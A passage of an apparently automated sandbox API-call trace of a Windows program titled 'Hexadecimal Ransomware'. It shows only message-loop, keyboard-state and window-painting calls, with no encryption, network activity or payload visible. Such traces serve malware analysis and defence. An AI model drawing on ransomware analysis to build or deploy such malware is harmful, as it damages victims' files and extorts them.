DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.754] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.755] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.755] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.755] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.755] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.755] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.756] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.756] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.756] DispatchMessageA (lpMsg=0x11fed00) returned 0x1 [0165.757] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.757] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.757] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.757] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0165.757] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0165.757] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0165.761] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.761] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.761] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.761] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.761] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.763] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.763] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.763] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.764] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.764] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.764] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.764] IsWindowUnicode (hWnd=0x202e6) returned 1 [0165.764] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0165.764] TranslateMessage (lpMsg=0x11fed00) returned 0 [0165.764] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0165.764] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0165.765] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0165.765] WaitMessage () returned 1 [0168.181] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.181] IsWindowUnicode (hWnd=0x102d8) returned 1 [0168.181] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.183] GetKeyState (nVirtKey=16) returned 0 [0168.183] GetKeyState (nVirtKey=17) returned 0 [0168.183] GetKeyState (nVirtKey=18) returned -128 [0168.183] SendMessageW (hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0168.183] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0168.183] GetParent (hWnd=0x202c8) returned 0x0 [0168.183] SendMessageW (hWnd=0x202c8, Msg=0x127, wParam=0x20002, lParam=0x0) returned 0x0 [0168.183] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x127, wParam=0x20002, lParam=0x0) returned 0x0 [0168.183] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.184] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.184] RedrawWindow (hWnd=0x202ca, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.184] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.185] GetStockObject (i=5) returned 0x900015 [0168.185] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66258) returned 0x102d2 [0168.186] SendMessageW (hWnd=0x102d2, Msg=0x202b, wParam=0x102d2, lParam=0x11fdab4) returned 0x0 [0168.186] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x202b, wParam=0x102d2, lParam=0x11fdab4) returned 0x0 [0168.186] RedrawWindow (hWnd=0x102d2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.186] CallWindowProcW (lpPrevWndFunc=0x7412d460, hWnd=0x102d4, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.186] RedrawWindow (hWnd=0x102d4, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.186] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.186] GetStockObject (i=5) returned 0x900015 [0168.188] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66262) returned 0x102d6 [0168.188] SendMessageW (hWnd=0x102d6, Msg=0x202b, wParam=0x102d6, lParam=0x11fdab4) returned 0x0 [0168.188] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d6, Msg=0x202b, wParam=0x102d6, lParam=0x11fdab4) returned 0x0 [0168.189] RedrawWindow (hWnd=0x102d6, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.189] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.189] GetStockObject (i=5) returned 0x900015 [0168.189] GetStockObject (i=5) returned 0x900015 [0168.190] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66264) returned 0x102d8 [0168.190] SendMessageW (hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fd9c4) returned 0x0 [0168.190] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fd9c4) returned 0x0 [0168.190] RedrawWindow (hWnd=0x102d8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.190] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.190] GetStockObject (i=5) returned 0x900015 [0168.191] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66266) returned 0x102da [0168.191] SendMessageW (hWnd=0x102da, Msg=0x202b, wParam=0x102da, lParam=0x11fdab4) returned 0x0 [0168.191] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x202b, wParam=0x102da, lParam=0x11fdab4) returned 0x0 [0168.191] RedrawWindow (hWnd=0x102da, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.191] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.191] GetStockObject (i=5) returned 0x900015 [0168.191] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66268) returned 0x102dc [0168.191] SendMessageW (hWnd=0x102dc, Msg=0x202b, wParam=0x102dc, lParam=0x11fdab4) returned 0x0 [0168.191] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x202b, wParam=0x102dc, lParam=0x11fdab4) returned 0x0 [0168.191] RedrawWindow (hWnd=0x102dc, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.192] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102de, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.192] RedrawWindow (hWnd=0x102de, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.192] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.192] GetStockObject (i=5) returned 0x900015 [0168.192] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66272) returned 0x102e0 [0168.192] SendMessageW (hWnd=0x102e0, Msg=0x202b, wParam=0x102e0, lParam=0x11fdab4) returned 0x0 [0168.192] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102e0, Msg=0x202b, wParam=0x102e0, lParam=0x11fdab4) returned 0x0 [0168.193] RedrawWindow (hWnd=0x102e0, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.193] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e2, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.193] RedrawWindow (hWnd=0x102e2, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.193] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x102e4, Msg=0x128, wParam=0x20002, lParam=0x0) returned 0x0 [0168.193] RedrawWindow (hWnd=0x102e4, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.193] RedrawWindow (hWnd=0x202c8, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0168.197] GetKeyState (nVirtKey=16) returned 0 [0168.197] GetKeyState (nVirtKey=17) returned 0 [0168.197] GetKeyState (nVirtKey=18) returned -128 [0168.330] TranslateMessage (lpMsg=0x11fed00) returned 1 [0168.330] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.330] GetKeyState (nVirtKey=16) returned 0 [0168.331] GetKeyState (nVirtKey=17) returned 0 [0168.331] GetKeyState (nVirtKey=18) returned -128 [0168.331] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x104, wParam=0x12, lParam=0x20380001) returned 0x0 [0168.331] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.334] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0168.334] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0168.335] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0168.335] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0168.354] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0168.385] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0168.385] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x0, lParam=0xf70) returned 0x0 [0168.387] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0168.388] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0168.391] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0168.392] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0168.392] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0168.394] IsWindowUnicode (hWnd=0x202c8) returned 1 [0168.394] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.394] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.394] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.394] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.395] IsWindowUnicode (hWnd=0x202c8) returned 1 [0168.395] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.395] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.395] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.406] BeginPaint (in: hWnd=0x202c8, lpPaint=0x11fe770 | out: lpPaint=0x11fe770) returned 0xf0105ee [0168.406] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0168.407] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe44c | out: lpwndpl=0x11fe44c) returned 1 [0168.407] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe3f8 | out: lpRect=0x11fe3f8) returned 1 [0168.408] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0168.408] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0168.408] GetSystemMetrics (nIndex=42) returned 0 [0168.408] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe2a0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0168.408] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe2a0) returned 0x16 [0168.408] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe300 | out: lpRect=0x11fe300) returned 1 [0168.408] GetCurrentObject (hdc=0xf0105ee, type=0x1) returned 0xb00017 [0168.408] GetCurrentObject (hdc=0xf0105ee, type=0x2) returned 0x900010 [0168.408] GetCurrentObject (hdc=0xf0105ee, type=0x7) returned 0x5080b [0168.408] GetCurrentObject (hdc=0xf0105ee, type=0x6) returned 0x8a01c2 [0168.408] SaveDC (hdc=0xf0105ee) returned 1 [0168.408] GetNearestColor (hdc=0xf0105ee, color=0x0) returned 0x0 [0168.408] CreateSolidBrush (color=0x0) returned 0x13100826 [0168.409] FillRect (hDC=0xf0105ee, lprc=0x11fe1a0, hbr=0x13100826) returned 1 [0168.412] DeleteObject (ho=0x13100826) returned 1 [0168.412] RestoreDC (hdc=0xf0105ee, nSavedDC=-1) returned 1 [0168.412] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0168.412] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0168.412] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0168.412] GetSystemMetrics (nIndex=42) returned 0 [0168.412] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe6e8, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0168.412] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe6e8) returned 0x16 [0168.412] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0168.413] EndPaint (hWnd=0x202c8, lpPaint=0x11fe76c) returned 1 [0168.413] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.413] IsWindowUnicode (hWnd=0x202ca) returned 1 [0168.413] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.413] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.413] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.413] BeginPaint (in: hWnd=0x202ca, lpPaint=0x11fe790 | out: lpPaint=0x11fe790) returned 0xf0105ee [0168.413] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0168.414] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0168.414] CreateCompatibleDC (hdc=0xf0105ee) returned 0x18010821 [0168.414] SelectObject (hdc=0x18010821, h=0xb050815) returned 0x85000f [0168.414] GdipCreateFromHDC (hdc=0x18010821, graphics=0x11fe7a8) returned 0x0 [0168.415] GdipTranslateWorldTransform (graphics=0x6e25d48, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0168.415] GdipSetClipRectI (graphics=0x6e25d48, x=0, y=0, width=88, height=120, combineMode=0x0) returned 0x0 [0168.415] GdipCreateMatrix (matrix=0x11fe7f0) returned 0x0 [0168.415] GdipGetWorldTransform (graphics=0x6e25d48, matrix=0x6e19d80) returned 0x0 [0168.415] GdipIsMatrixIdentity (matrix=0x6e19d80, result=0x11fe808) returned 0x0 [0168.415] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0168.415] GdipGetMatrixElements (matrix=0x6e19d80, matrixOut=0x1593ea0) returned 0x0 [0168.415] LocalFree (hMem=0x1593ea0) returned 0x0 [0168.415] GdipDeleteMatrix (matrix=0x6e19d80) returned 0x0 [0168.415] GdipCreateRegion (region=0x11fe7f0) returned 0x0 [0168.415] GdipGetClip (graphics=0x6e25d48, region=0x6e26028) returned 0x0 [0168.415] GdipIsInfiniteRegion (region=0x6e26028, graphics=0x6e25d48, result=0x11fe7fc) returned 0x0 [0168.415] GdipSaveGraphics (graphics=0x6e25d48, state=0x11fe828) returned 0x0 [0168.416] GetWindowTextLengthW (hWnd=0x202ca) returned 0 [0168.416] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0168.416] GetSystemMetrics (nIndex=42) returned 0 [0168.416] GetWindowTextW (in: hWnd=0x202ca, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0168.416] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0168.416] GetClientRect (in: hWnd=0x202ca, lpRect=0x11fe7f0 | out: lpRect=0x11fe7f0) returned 1 [0168.416] GdipCreateRegion (region=0x11fe644) returned 0x0 [0168.416] GdipGetClip (graphics=0x6e25d48, region=0x6e26318) returned 0x0 [0168.416] GdipCreateMatrix (matrix=0x11fe644) returned 0x0 [0168.416] GdipGetWorldTransform (graphics=0x6e25d48, matrix=0x6e263a8) returned 0x0 [0168.416] GdipIsMatrixIdentity (matrix=0x6e263a8, result=0x11fe65c) returned 0x0 [0168.416] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0168.416] GdipGetMatrixElements (matrix=0x6e263a8, matrixOut=0x1593ea0) returned 0x0 [0168.416] LocalFree (hMem=0x1593ea0) returned 0x0 [0168.416] GdipCombineRegionRegion (region=0x6e26318, region2=0x6e26028, combineMode=0x1) returned 0x0 [0168.416] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0168.416] GdipGetMatrixElements (matrix=0x6e263a8, matrixOut=0x1593c38) returned 0x0 [0168.417] LocalFree (hMem=0x1593c38) returned 0x0 [0168.417] GdipDeleteMatrix (matrix=0x6e263a8) returned 0x0 [0168.417] GdipIsInfiniteRegion (region=0x6e26318, graphics=0x6e25d48, result=0x11fe684) returned 0x0 [0168.417] GdipIsInfiniteRegion (region=0x6e26318, graphics=0x6e25d48, result=0x11fe674) returned 0x0 [0168.417] GdipGetRegionHRgn (region=0x6e26318, graphics=0x6e25d48, hRgn=0x11fe674) returned 0x0 [0168.417] GdipDeleteRegion (region=0x6e26318) returned 0x0 [0168.417] GdipGetDC (graphics=0x6e25d48, hdc=0x11fe68c) returned 0x0 [0168.417] GetCurrentObject (hdc=0x18010821, type=0x1) returned 0xb00017 [0168.417] GetCurrentObject (hdc=0x18010821, type=0x2) returned 0x900010 [0168.417] GetCurrentObject (hdc=0x18010821, type=0x7) returned 0xb050815 [0168.417] GetCurrentObject (hdc=0x18010821, type=0x6) returned 0x8a01c2 [0168.417] SaveDC (hdc=0x18010821) returned 1 [0168.417] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x19040825 [0168.418] GetClipRgn (hdc=0x18010821, hrgn=0x19040825) returned 0 [0168.418] SelectClipRgn (hdc=0x18010821, hrgn=0x1c040822) returned 2 [0168.418] DeleteObject (ho=0x19040825) returned 1 [0168.418] DeleteObject (ho=0x1c040822) returned 1 [0168.418] OffsetViewportOrgEx (in: hdc=0x18010821, x=0, y=0, lppt=0x3341b30 | out: lppt=0x3341b30) returned 1 [0168.418] GetNearestColor (hdc=0x18010821, color=0x0) returned 0x0 [0168.418] CreateSolidBrush (color=0x0) returned 0x14100826 [0168.418] FillRect (hDC=0x18010821, lprc=0x11fe690, hbr=0x14100826) returned 1 [0168.835] DeleteObject (ho=0x14100826) returned 1 [0168.835] RestoreDC (hdc=0x18010821, nSavedDC=-1) returned 1 [0168.835] GdipReleaseDC (graphics=0x6e25d48, hdc=0x18010821) returned 0x0 [0168.835] GdipRestoreGraphics (graphics=0x6e25d48, state=0xfda30dbd) returned 0x0 [0168.835] GdipDeleteRegion (region=0x6e26028) returned 0x0 [0168.835] GetWindowTextLengthW (hWnd=0x202ca) returned 0 [0168.835] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0168.835] GetSystemMetrics (nIndex=42) returned 0 [0168.835] GetWindowTextW (in: hWnd=0x202ca, lpString=0x11fe740, nMaxCount=1 | out: lpString="") returned 0 [0168.835] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202ca, Msg=0xd, wParam=0x1, lParam=0x11fe740) returned 0x0 [0168.836] GdipGetImageWidth (image=0x6e0f260, width=0x11fe6c4) returned 0x0 [0168.836] GdipGetImageHeight (image=0x6e0f260, height=0x11fe6c4) returned 0x0 [0168.836] GdipDrawImageRectI (graphics=0x6e25d48, image=0x6e0f260, x=0, y=0, width=107, height=113) returned 0x0 [0168.872] GdipGetDC (graphics=0x6e25d48, hdc=0x11fe7e8) returned 0x0 [0168.872] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=88, cy=120, hdcSrc=0x18010821, x1=0, y1=0, rop=0xcc0020) returned 1 [0168.872] GdipReleaseDC (graphics=0x6e25d48, hdc=0x18010821) returned 0x0 [0168.872] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0168.988] SelectObject (hdc=0x18010821, h=0x85000f) returned 0xb050815 [0168.989] DeleteDC (hdc=0x18010821) returned 1 [0168.989] GdipDeleteGraphics (graphics=0x6e25d48) returned 0x0 [0168.989] EndPaint (hWnd=0x202ca, lpPaint=0x11fe78c) returned 1 [0168.990] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.990] IsWindowUnicode (hWnd=0x202e6) returned 1 [0168.990] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.990] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.990] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.993] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.993] IsWindowUnicode (hWnd=0x202e6) returned 1 [0168.993] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.993] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.993] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.993] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.994] IsWindowUnicode (hWnd=0x202e6) returned 1 [0168.994] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.994] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.994] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.994] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.994] IsWindowUnicode (hWnd=0x202e6) returned 1 [0168.994] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.994] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.994] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.994] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.995] IsWindowUnicode (hWnd=0x102d2) returned 1 [0168.995] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0168.995] TranslateMessage (lpMsg=0x11fed00) returned 0 [0168.995] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0168.995] BeginPaint (in: hWnd=0x102d2, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0xf0105ee [0168.996] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102d2, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0168.996] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0168.996] CreateCompatibleDC (hdc=0xf0105ee) returned 0x1b010821 [0168.996] SelectObject (hdc=0x1b010821, h=0xb050815) returned 0x85000f [0168.996] GdipCreateFromHDC (hdc=0x1b010821, graphics=0x11fe76c) returned 0x0 [0168.996] GdipTranslateWorldTransform (graphics=0x6e25db8, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0168.997] GdipSetClipRectI (graphics=0x6e25db8, x=0, y=0, width=92, height=18, combineMode=0x0) returned 0x0 [0168.997] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0168.997] GdipGetWorldTransform (graphics=0x6e25db8, matrix=0x6e26098) returned 0x0 [0168.997] GdipIsMatrixIdentity (matrix=0x6e26098, result=0x11fe7cc) returned 0x0 [0168.997] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ae8 [0168.997] GdipGetMatrixElements (matrix=0x6e26098, matrixOut=0x1593ae8) returned 0x0 [0168.997] LocalFree (hMem=0x1593ae8) returned 0x0 [0168.997] GdipDeleteMatrix (matrix=0x6e26098) returned 0x0 [0168.998] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0168.998] GdipGetClip (graphics=0x6e25db8, region=0x6e19d10) returned 0x0 [0168.998] GdipIsInfiniteRegion (region=0x6e19d10, graphics=0x6e25db8, result=0x11fe7c0) returned 0x0 [0168.998] GdipSaveGraphics (graphics=0x6e25db8, state=0x11fe7ec) returned 0x0 [0168.998] 